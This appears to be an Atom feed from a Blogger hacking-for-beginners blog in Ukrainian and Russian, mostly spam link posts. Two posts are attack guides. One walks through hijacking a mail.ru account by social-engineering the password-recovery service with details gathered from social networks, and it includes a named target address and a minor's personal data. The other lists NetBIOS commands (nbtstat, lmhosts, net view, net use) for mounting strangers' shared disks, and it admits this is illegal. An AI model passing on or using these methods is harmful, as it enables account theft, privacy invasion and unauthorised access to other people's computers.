<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3396992018587873090</id><updated>2011-07-30T09:54:54.560-07:00</updated><title type='text'>Блог програмиста 4-го курса ...</title><subtitle type='html'>Книги хакерство скачать
Програмы взлом жылезо</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default?start-index=101&amp;max-results=100'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>197</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-7896173024555214483</id><published>2010-01-24T10:00:00.000-08:00</published><updated>2010-01-24T10:00:36.825-08:00</updated><title type='text'>Сестренка</title><content type='html'>&lt;a href='http://1.bp.blogspot.com/_gf8tJPCHOcE/S1yKw6g3_ZI/AAAAAAAAAEo/l7tHRy0YB5M/s1600-h/a_c973c344.jpg'&gt;&lt;img src='http://1.bp.blogspot.com/_gf8tJPCHOcE/S1yKw6g3_ZI/AAAAAAAAAEo/l7tHRy0YB5M/s400/a_c973c344.jpg' border='0' alt=''style='clear:both;float:left; margin:0px 10px 10px 0;' /&gt;&lt;/a&gt;&amp;nbsp;&lt;div style='clear:both; text-align:LEFT'&gt;&lt;a href='http://picasa.google.com/blogger/' target='ext'&gt;&lt;img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' style='border: 0px none ; padding: 0px; background: transparent none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;' align='middle' border='0' /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-7896173024555214483?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/7896173024555214483/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=7896173024555214483' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7896173024555214483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7896173024555214483'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2010/01/blog-post.html' title='Сестренка'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gf8tJPCHOcE/S1yKw6g3_ZI/AAAAAAAAAEo/l7tHRy0YB5M/s72-c/a_c973c344.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-4918985887098352629</id><published>2009-10-07T05:45:00.001-07:00</published><updated>2009-10-07T05:45:56.424-07:00</updated><title type='text'>Введення в СІ [Хакерство для новачків]</title><content type='html'>Введення в СІ.&lt;br /&gt;------------------------&lt;br /&gt;Зміст:&lt;br /&gt;1. СІ, коротко про все.&lt;br /&gt;2. Психологія людини.&lt;br /&gt;3. Методи одержання інформації.&lt;br /&gt;4. Післямова.&lt;br /&gt;-------------------------------------------------- ------------&lt;br /&gt;------------------- СІ, коротко про все -----------------&lt;br /&gt;-------------------------------------------------- ------------&lt;br /&gt;Дорогі початківці хакери (і не початківці теж), я радий представити Вам свою статтю Соціальної Інженерії.&lt;br /&gt;Що таке Соціальна Інженерія? В Інтернеті є багато описів сему слову, але&lt;br /&gt;тільки хакер може зрозуміти це.&lt;br /&gt;Перш за все СІ - вплив на людину психологічно, будь то простий самотня людина, просунутий юзер, нещадні оператори і адміни великих Інтернет-ресурсів. УСІ ВОНИ ЗАЛИШАЮТЬСЯ ЛЮДЬМИ! А це значить що всі вони уразливі до психологічного впливу.&lt;br /&gt;Тобі, дорогий мій соратник, не треба копати літературу типу "Як загіпнотизувати людини через інтернет", "Як маніпулювати людьми" і т.п. СІ є така собі "Імпровізація ляльковода", при тому об'єкт не помічає ніякого маніпулятора над собою, він думає що він управляє собою і здійснює всі свої дії, аж ні!&lt;br /&gt;Загалом, дорогий хакер, знаючи що об'єкт атаки - людина, знай, ти - маніпулятор і ляльковод.&lt;br /&gt;&lt;br /&gt;-------------------------------------------------- ------------&lt;br /&gt;------------------ Психологія людини ----------------&lt;br /&gt;-------------------------------------------------- ------------&lt;br /&gt;&lt;br /&gt;Якщо ти думаєш, що ти ляльковод і можеш робити з об'єктом як хочеш, то ти не прав. Маніпулювання не містить у собі грубе поводження. Воно може бути у наступному вигляді:&lt;br /&gt;-Жаль&lt;br /&gt;-Доброта&lt;br /&gt;-Співчуття&lt;br /&gt;-Обман&lt;br /&gt;Кожен використовує це по-різному.&lt;br /&gt;Пробачте за маленький розділ)&lt;br /&gt;&lt;br /&gt;-------------------------------------------------- ------------&lt;br /&gt;----------- Методи одержання інформації ----------&lt;br /&gt;-------------------------------------------------- ------------&lt;br /&gt;&lt;br /&gt;Отже, існують наступні методи:&lt;br /&gt;-Підміна&lt;br /&gt;-Почуття (див. Психологія людини)&lt;br /&gt;-Соц. мережі&lt;br /&gt;&lt;br /&gt;Розглянемо все на прикладі:&lt;br /&gt;Об'єкт атаки - мій соратник "хакер" (хай вибачать мене всі хакери планети)&lt;br /&gt;e-mail: trixls@rambler.ru&lt;br /&gt;&lt;br /&gt;Чому мило? та тому що на цьому варто Контакт, Однокласники, і т.п.&lt;br /&gt;&lt;br /&gt;Крок первий.Обдумиваем "наліт"&lt;br /&gt;&lt;br /&gt;Для злому мила я використовую сервіс повернення паролів. Це спеціальний сервіс на mail.ru, де вказуєш докладно свої дані і якщо вони співпадають то тобі на іншу поштову скриньку надсилають новий пароль.&lt;br /&gt;Створюємо липовий ящик типу "trixls@rambler.ru"&lt;br /&gt;Отже, збором відомостей займемося ми з "Контакту" і "Мого Світу". І не забудьте зібрати інфу про друзів, які у нього в "Моєму світі"!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Крок другий. "Наліт"&lt;br /&gt;&lt;br /&gt;Адреса http://win.mail.ru/cgi-bin/passremind?action=sendrequest&amp;Username=default&amp;Domain=mail.ru&lt;br /&gt;Отже, заповнюємо всі дані, у місцях "пароль" і "секретне питання" пишемо зламали ((( "або" вкрали хакери! "&lt;br /&gt;Поля з датами. Окрема тема. Коротше дату останнього заходу пишемо на цей день, а народження їсть ь в "МІЙ СВІТ" знову-ж)))&lt;br /&gt;Де треба заповнити поле в самому низу "доп. Інфо", пишемо сумну історію, про те, як злі батьки заборонили вхід на всі, крім шановного й улюбленого мейл.ру і дівчина сидить тільки в агента і все ... Ну короче розписуємо багато за все, говоримо про друзів, які на "Мій світ" і т.п. вказуємо потрібні дані в цьому полі теж)&lt;br /&gt;Пишемо другому адресу (імя_об'екта@другой_сервіс.ру)&lt;br /&gt;Відправляємо&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Крок третій. Отримання пароля&lt;br /&gt;&lt;br /&gt;Отже, нам має прийти на липовий ящик наступне:&lt;br /&gt;--- Здравствуйте.&lt;br /&gt;Пароль до п / я trixls@mail.ru: bo4s8fsw (пароль я вже поміняв)))&lt;br /&gt;Ми рекомендуємо Вам встановити новий пароль (http://www.mail.ru/pages/help).&lt;br /&gt;Також рекомендуємо Вам змінити таємне запитання і відповідь на нього (http://www.mail.ru/pages/help/2.html #).&lt;br /&gt;З повагою,&lt;br /&gt;Служба підтримки користувачів&lt;br /&gt;поштової системи Mail.ru&lt;br /&gt;&lt;br /&gt;Якщо Вам прийшов "Недостатньо відомостей - користуєтеся моїм методом, а саме:&lt;br /&gt;&lt;br /&gt;Зрозумійте мене правильно, прошу! Мій ящик зламали і поміняли відповідь на таємне&lt;br /&gt;питання, тому я нічого не можу вказати! Ви ж теж люди! Це&lt;br /&gt;максимум з усього того, що я знаю, решта поміняли!&lt;br /&gt;&lt;br /&gt;І тоді-то Вам точно прийде пароль, перевірено на 10 людей. Результат 10 з 10!&lt;br /&gt;&lt;br /&gt;-------------------------------------------------- ------------&lt;br /&gt;--------------------- Післямова -------------------------&lt;br /&gt;-------------------------------------------------- ------------&lt;br /&gt;&lt;br /&gt;Отже, даний метод перевірений мною і написаний не тільки в ознайомлювальних цілях;)&lt;br /&gt;&lt;br /&gt;Ось Вам листа для ознайомлювальних цілей:&lt;br /&gt;--------------------&lt;br /&gt;--------------------&lt;br /&gt;&lt;br /&gt;Здравствуйте.&lt;br /&gt;&lt;br /&gt;У вашому запиті на пароль до поштової скриньки trixls@mail.ru Ви повідомили наступні дані:&lt;br /&gt;Ім'я: Олег&lt;br /&gt;Прізвище: Салтиков&lt;br /&gt;Cекретний питання:???&lt;br /&gt;Відповідь на секретне питання: Поміняли&lt;br /&gt;Пол: М&lt;br /&gt;Вік:&lt;br /&gt;Регіон: Росія&lt;br /&gt;Місто: Солнечногорск&lt;br /&gt;Дата реєстрації: 15-6-2008&lt;br /&gt;Коментарі: trixls@mail.ru&lt;br /&gt;Востаннє я змінював пароль вчора, а саме 30.08.09, але в мене однокласник займається зломом і я думаю це він зробив!&lt;br /&gt;При реєстрації у мене був простий пароль, але його я не пам'ятаю, а відповідь на таємне запитання при реєстрації був "Топільська", це прізвище моєї матері, чого я не забуду.&lt;br /&gt;&lt;br /&gt;Це мою поштову скриньку, у друзях у мене моя дівчина, Дарина Сучкова, 8142_94@mail.ru, один Едвін, він вболіває за спартак і челсі, сестра, ще один і Олена Третьякова! Едвін фанат Лемпарда як і я)&lt;br /&gt;&lt;br /&gt;Програмують на Pascal, вчуся на 4 і 5, з першого вересня 09 года піду в 8-ий клас.&lt;br /&gt;&lt;br /&gt;ВКонтакте.ру я видалив цю сторінку, про всяк випадок, не хочу, чтою зламали!&lt;br /&gt;&lt;br /&gt;Сподіваюся Ви повірите мені, адже я зараз далеко від своєї дівчини, а батьки через покарання відкрили мені доступ тільки в mail.ru і blogs.mail.ru ...&lt;br /&gt;&lt;br /&gt;Спасибо за ваш увагу, з повагою і надією на адміністрацію Олег Салтиков!&lt;br /&gt;&lt;br /&gt;Для видачі пароля цих даних недостатньо.&lt;br /&gt;За наданими Вами даними ми не можемо вислати Вам пароль.&lt;br /&gt;Можливо, у Вашому запиті невірно вказано ім'я поштової скриньки або домен (mail.ru, inbox.ru, list.ru або bk.ru)&lt;br /&gt;Якщо даний п / я був зареєстрований не Вами особисто - зверніться за цією інформацією до реєструвати його особі.&lt;br /&gt;Для відновлення пароля, вкажіть, будь ласка, всю інформацію, введену при реєстрації:&lt;br /&gt;- Ім'я а / с;&lt;br /&gt;- Таємне запитання;&lt;br /&gt;- Відповідь на нього;&lt;br /&gt;- Місто;&lt;br /&gt;- ПІБ.&lt;br /&gt;Будь ласка, пригадайте:&lt;br /&gt;- Приблизну дату реєстрації даного а / с;&lt;br /&gt;- Який електронна адреса була вказана при його реєстрації;&lt;br /&gt;- На яку адресу коштує в ньому пересилання (якщо така є);&lt;br /&gt;- Які адреси можуть перебувати в адресній книзі в цьому а / с;&lt;br /&gt;- Які папки крім стандартних створені в ньому;&lt;br /&gt;- З яких IP-адрес зазвичай здійснювалися заходи в цей а / с;&lt;br /&gt;- Приблизну комбінацію символів в паролі;&lt;br /&gt;- Будь-яку іншу інформацію, що підтверджує Ваші права на цей а / с.&lt;br /&gt;&lt;br /&gt;Цю інформацію введіть у формі для відновлення пароля&lt;br /&gt;http://mail.ru/cgi-bin/passremind?action=sendrequest&amp;Username=trixls&amp;Domain=mail.ru&lt;br /&gt;&lt;br /&gt;З повагою,&lt;br /&gt;Служба підтримки користувачів&lt;br /&gt;поштової системи Mail.ru&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-4918985887098352629?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/4918985887098352629/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=4918985887098352629' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/4918985887098352629'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/4918985887098352629'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/10/blog-post_3361.html' title='Введення в СІ [Хакерство для новачків]'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-3062570422533096913</id><published>2009-10-07T05:40:00.001-07:00</published><updated>2009-10-07T05:40:22.778-07:00</updated><title type='text'>Злому (будемо порушувати закон) [Хакерство для новачків]</title><content type='html'>Всем привет! Я пишу свою першу статтю на хакзоне, сподіваюся вона комунібуть стане в нагоді)) думаю з назви статті ви вже зрозуміли що за цей злом йде кримінальна відповідальність, і найгірше що ви навіть не знаєте на чий ПК ви потрапили, отже можете качати навіть секретні дані СБУ , і т.д. Але у цього злому є і свої плюси: вам не знадобиться майже ніякого софта. Весь софтвер надала нам кватирка, але все-таки одну прогу скачати вам знадобиться. Заходимо на сайт http / / www.xakep.ru і в рядку "пошук" пишемо "xSHaReZ" (без ковичек!!). З усього знайденого клікаємо по самій верхній, знаходимо сканер і качаємо. Для того, щоб злом пройшов успішно нам потрібно встановити клієнт мереж Майкрософт і протокол "NetBIOS". Це ви повинні вміти і самі. Сканер проводить сканування портів ваших жертв. Після загляньте в розділ "логи" і якщо ви побачите приблизно таке:&lt;br /&gt;&lt;br /&gt;IP адреса 62.171.274.1&lt;br /&gt;Назва компа: VASYA&lt;br /&gt;Ім `я користувача за компом: MAKAROV&lt;br /&gt;Робоча група: VASYA&lt;br /&gt;&lt;br /&gt;то у вас є шанс. Тепер заходимо в Пусквиполнть і набираємо:&lt;br /&gt;"nbtstat.exe - A ip.ad.re.ss" ip.ad.re.ss - той що видав сканер (у нас це 62.171.274.1) після кліка по вводу вікно доса видасть вам щось таке:&lt;br /&gt;&lt;br /&gt;VASYA &lt;00&gt; UNIQUE&lt;br /&gt;VASYA &lt;15&gt; UNIQUE&lt;br /&gt;SERVER &lt;00&gt; GROUP&lt;br /&gt;SERVER &lt;1C&gt; GROUP&lt;br /&gt;SERVER &lt;1E&gt; GROUP&lt;br /&gt;VASYA &lt;05&gt; UNIQUE&lt;br /&gt;MAC Adress = 00-00-00-00-00-00&lt;br /&gt;&lt;br /&gt;Тепер будемо шукати на кватирці файл "Imhosts". Відкриваємо пошук і шукаємо. Спочатку він порожній. Пишемо в нього "ip.ad.re.ss VASYA # pre". Зберігаємо. Знову йдемо в виконати і друкуємо: "netview VASYA". Якщо вам пощастило і ви побачите таке:&lt;br /&gt;&lt;br /&gt;Share name Type&lt;br /&gt;---------------------------------&lt;br /&gt;MyDisk Disk&lt;br /&gt;Obshiye Disk&lt;br /&gt;Команда виконана успішна&lt;br /&gt;&lt;br /&gt;Злом вдався. Якщо ж ні, то спробуйте все заново, а краще з іншим ПК. Але якщо вам пощастило і все пройшло успішно заходимо в виконати і пишемо:&lt;br /&gt;"net use x: VASYAMyDisk". Все, його ПК ваш. Йдемо в "мій комп'ютер", у ньому з'явився новий диск "Х")).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-3062570422533096913?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/3062570422533096913/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=3062570422533096913' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3062570422533096913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3062570422533096913'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/10/blog-post_1170.html' title='Злому (будемо порушувати закон) [Хакерство для новачків]'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-59582082530422492</id><published>2009-10-07T05:16:00.000-07:00</published><updated>2009-10-07T05:17:44.474-07:00</updated><title type='text'></title><content type='html'>Любые виды переводов ... Перевод документов, технический перевод...&lt;br /&gt;&lt;a href='http://exito.com.ua/'&gt;бюро переводов&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-59582082530422492?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/59582082530422492/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=59582082530422492' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/59582082530422492'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/59582082530422492'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/10/blog-post_3810.html' title=''/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-8899989982832742647</id><published>2009-10-07T04:56:00.000-07:00</published><updated>2009-10-07T05:06:50.998-07:00</updated><title type='text'>Нарыл вот интересную штуку...</title><content type='html'>Нашел сайт, база актеров ... На нем проводиться кастинг для участия в съемках : &lt;br /&gt;Фильмов, рекламы, и прочего ...Вы можете спокойно в етом поучаствовать .&lt;br /&gt;&lt;a href='http://lica.by/'&gt;кастинги киев&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-8899989982832742647?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/8899989982832742647/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=8899989982832742647' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8899989982832742647'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8899989982832742647'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/10/blog-post_7327.html' title='Нарыл вот интересную штуку...'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-4104816737337876149</id><published>2009-10-07T03:03:00.000-07:00</published><updated>2009-10-07T03:04:47.717-07:00</updated><title type='text'></title><content type='html'>&lt;a href='http://dngs.ru'&gt;доска бесплатных объявлений&lt;/a&gt;&lt;br /&gt;Можно разместить любое объявление .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-4104816737337876149?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/4104816737337876149/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=4104816737337876149' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/4104816737337876149'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/4104816737337876149'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/10/blog-post_7266.html' title=''/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-1326407180247929483</id><published>2009-10-07T02:55:00.000-07:00</published><updated>2009-10-07T03:01:53.312-07:00</updated><title type='text'>Домик =)</title><content type='html'>Представ те как хорашо бы было , купить недвижимость в Испании или Франции. &lt;br /&gt;Особенно если етот домик на берегу побережья...   &lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.crimea-realty.com/uploads/posts/thumbs/1218025255_dom_simeiz_1.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 337px; height: 450px;" src="http://www.crimea-realty.com/uploads/posts/thumbs/1218025255_dom_simeiz_1.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href='http://www.home585.ru/'&gt;недвижимость в Испании&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-1326407180247929483?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/1326407180247929483/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=1326407180247929483' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1326407180247929483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1326407180247929483'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/10/blog-post_1202.html' title='Домик =)'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-2641742204323254063</id><published>2009-10-07T02:43:00.000-07:00</published><updated>2009-10-07T02:47:45.739-07:00</updated><title type='text'>Ночь на пролет .</title><content type='html'>Совсем недавно собрались с друзьями поиграть в покер ... У меня на дому собрались , купили в карты сидели играли но в скором времени нам ето очень надоело так как играли в дурака... Ктото из друзей предложил поиграть в покер ... Но мысль сразу была откинута так как ... Правил мы не знали .... Ну вот ... я нарыл &lt;a href='http://www.pokerseat.ru/photo/1-0-131'&gt;правила игры в покер&lt;/a&gt; .&lt;br /&gt;Дак мы потом сидели играли до 6-ти часов утра =) вот .&lt;br /&gt;&lt;br /&gt;&lt;a href='http://www.pokerseat.ru/photo/1-0-131'&gt;правила игры в покер для новичков&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-2641742204323254063?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/2641742204323254063/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=2641742204323254063' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/2641742204323254063'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/2641742204323254063'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/10/blog-post_07.html' title='Ночь на пролет .'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-2098360445614862047</id><published>2009-10-04T14:18:00.000-07:00</published><updated>2009-10-04T14:20:02.535-07:00</updated><title type='text'></title><content type='html'>&lt;a href=http://www.ruclicks.com/&gt;RuClicks.com&lt;/a&gt; – биржа трафика – это отличная возможность заработать и привлечь посетителей на свой сайт. &lt;br /&gt;&lt;br /&gt;Как биржа трафика &lt;a href=http://www.ruclicks.com/&gt;RuClicks.com&lt;/a&gt; может помочь раскрутить свой сайт? Очень просто – здесь вы можете легко и быстро купить трафик по цене от 3 долларов за 1000 уникальных посетителей! Биржа предлагает посетителей из разных категорий, а так же по геотаргетингу. Вы можете купить посетителей даже из своего города. &lt;br /&gt;&lt;br /&gt;Как заработать с &lt;a href=http://www.ruclicks.com/&gt;RuClicks.com&lt;/a&gt;? Допустим, у меня есть сайт и я хочу заработать. Что я могу сделать: &lt;br /&gt;1) Я могу добавить на сайт ссылки на продажу трафика. За каждого отправленного посетителя биржа начислит мне деньги, которые я смогу снять в любой момент при достижении минимальной суммы в 20 долларов на счету. &lt;br /&gt;2) Я могу добавить на сайт ссылку на партнерскую программу &lt;a href=http://www.ruclicks.com/&gt;RuClicks.com&lt;/a&gt; и я буду получать 5% от всех покупок, сделанных привлеченными рекламодателями. &lt;br /&gt;&lt;br /&gt;На данный момент через биржу &lt;a href=http://www.ruclicks.com/&gt;RuClicks.com&lt;/a&gt; каждый день продается почти миллион русскоязычных посетителей и это один из наиболее динамично развивающихся проектов рунета. Не упустите свою возможность! &lt;br /&gt;&lt;br /&gt;Ссылка на сайт: &lt;a href=http://www.ruclicks.com/&gt;http://www.ruclicks.com/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-2098360445614862047?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/2098360445614862047/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=2098360445614862047' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/2098360445614862047'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/2098360445614862047'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/10/ruclicks.html' title=''/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-3070072652816612959</id><published>2009-10-04T14:01:00.000-07:00</published><updated>2009-10-04T14:11:07.411-07:00</updated><title type='text'></title><content type='html'>&lt;a href="http://notebook.eliteman.ru/wp-content/uploads/2007/11/acer-aspire-as5920.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 500px; height: 500px;" src="http://notebook.eliteman.ru/wp-content/uploads/2007/11/acer-aspire-as5920.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Недавно купил се такую вот машыну =)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-3070072652816612959?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/3070072652816612959/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' 